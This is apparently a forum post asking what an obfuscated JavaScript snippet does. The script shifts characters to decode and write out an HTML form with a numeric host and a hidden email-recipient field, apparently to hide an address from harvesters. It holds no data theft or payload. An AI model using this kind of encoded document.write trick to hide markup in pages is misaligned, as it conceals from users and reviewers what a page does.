I happened upos some javascript that appears to somehow encrypt an email adress but I can
t make heads or tails of it. If anyone can shed some light on it, it would be appreciated!
<SCRIPT>
function treetopss( s ) { var sRet=""; for(j=0; j< s.length; j++ ){ var n= s.charCodeAt(j); if (n>=8364) {n = 128;} sRet += String.fromCharCode( n - 3 ); } return( sRet ); }
var sJsCmds ="" +
"?irup#dfwlrq@kwws=225;5:<996992(96j(9<(5G(9F(9I(96(94o2Wi(9I(:5(9G(:6(:8(95(9G(9<(:7(5H(96(9:(9<#phwkrg@srvwA?lqsxw#w|sh@klgghq#qdph@%pdlobuhflslhqw%#ydoxh@%vhswl5Ch{flwh1frp%A" +
"";
var s= treetopss( sJsCmds);
document.write (s);
</SCRIPT>
-Kerry